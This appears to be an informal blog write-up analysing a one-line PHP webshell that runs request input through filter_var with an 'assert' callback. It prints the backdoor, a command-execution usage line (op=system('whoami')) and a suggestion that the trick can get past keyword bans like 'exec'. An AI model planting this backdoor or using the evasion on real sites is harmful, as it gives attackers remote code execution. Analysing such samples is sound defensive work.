[12.25]The fisrt samples of php Trojan analysis

The Sample

<?php
filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));
?>

yes,it seems easy to understand,So just try to learn more from this sample

Analysis

filter_var

From php.net:

filter_var — Filters a variable with a specified filter

Description:
mixed filter_var ( mixed $variable [, int $filter = FILTER_DEFAULT [, mixed $options ]] )

1. For $variable,it’s a Value to filter.
2. For FILTER_DEFAULT,it’s the ID of the FILTER to apply,let’s see what type do we have?We can see it at the end of this article so that we can continue our study.
3. For $options,it used to accepts the options for FILTER which was needed

Sample

For the sample,it use the FILTER_CALLBACK filter,let’s see the use of it:
he is in the ‘Other filters’

it used to call user-defined function to filter data,And the ‘Options’ equal to ‘callable function or method’
Okay,now we get the meaning:

filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));

he uses FILTER_CALLBACK to call the function – ‘assert’ to $_REQUEST['op']
Next,make it more obvious:The expression equal to this expression

assert($_REQUEST['op']);

so,we can easy to do like this: url?op=system('whoami') to exec our code.Dangerous!

FILTER TYPE

it were divided to four categories
Validate filters,Sanitize filters,Other filters and Filter tags.

For validate filters

1. FILTER_VALIDATE_BOOLEAN
   Returns TRUE for “1”, “true”, “on” and “yes”. Returns FALSE otherwise.

   If FILTER_NULL_ON_FAILURE is set, FALSE is returned only for “0”, “false”, “off”, “no”, and “”, and NULL is returned for all non-boolean values.

2. FILTER_VALIDATE_DOMAIN

3. FILTER_VALIDATE_EMAIL

4. FILTER_VALIDATE_FLOAT

5. FILTER_VALIDATE_INT

6. FILTER_VALIDATE_IP

7. FILTER_VALIDATE_MAC

8. FILTER_VALIDATE_REGEXP

9. FILTER_VALIDATE_URL
   Obviously to find the relation between them through one example,So i hide the explain of the other

For Sanitize filters

1. FILTER_SANITIZE_EMAIL
   Remove all characters except letters, digits and !#$%&’*±=?^_`{|}~@.[].
2. FILTER_SANITIZE_ENCODED
3. FILTER_SANITIZE_MAGIC_QUOTES
4. FILTER_SANITIZE_NUMBER_FLOAT
5. FILTER_SANITIZE_NUMBER_INT
6. FILTER_SANITIZE_SPECIAL_CHARS
7. FILTER_SANITIZE_FULL_SPECIAL_CHARS
8. FILTER_SANITIZE_STRING
9. FILTER_SANITIZE_STRIPPED
10. FILTER_SANITIZE_URL
11. FILTER_UNSAFE_RAW

Other filters

1. FILTER_CALLBACK

Filter flags

use in other filters to do the Fine-grained work
i will show you a pic about it

What can we get from this story?

1. pay attention to assert,no matter if he occurs like a funciton or not
2. the use of filter_var,maybe we can use it to bypass somethings just disable word like exec
3. lots of FILTER TYPE wait for us to dig out somethings